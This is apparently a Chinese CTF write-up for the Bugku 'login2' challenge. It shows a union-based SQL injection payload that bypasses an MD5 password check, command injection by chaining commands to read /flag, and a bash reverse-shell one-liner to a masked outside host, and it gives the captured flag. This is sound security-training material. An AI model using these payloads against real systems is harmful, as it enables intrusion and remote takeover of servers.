bugku_login2_wp

前言

在线靶场地址：https://ctf.bugku.com/

login2

查看题目

抓包

是一个登录框用万能账户抓包尝试


发送到重发器中

base64解码

看到tip中有个base64编码的密文解码

分析查询语句

点击查看明文

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

找密码与md5后密码一样，利用union查询，查找一个不存在的然后插入进去，这时候联合查询就会构造一个虚拟数据

点击查看payload

username=admin' union select 1,md5(123)#&password=123

可以看到已经登录成功

rce&flag

既然能够检查服务状态那就查看一下进程
ps -a

看提示发现需要拼接命令
123&&ls >1.txt
将查看文件的输出的1.txt

查看根目录下文件
123&&ls />2.txt

查看flag
123&&cat /flag>3.txt

反弹shell&flag

c=123 ; bash -i >& /dev/tcp/**.**.**.**/60010 0>&1
反弹到vps上面
vps开启监听

网页中执行命令


成功接收到shell

当前目录下没有flag
查看根目录


flag{5a9963e112c2aefe20e171652730885c}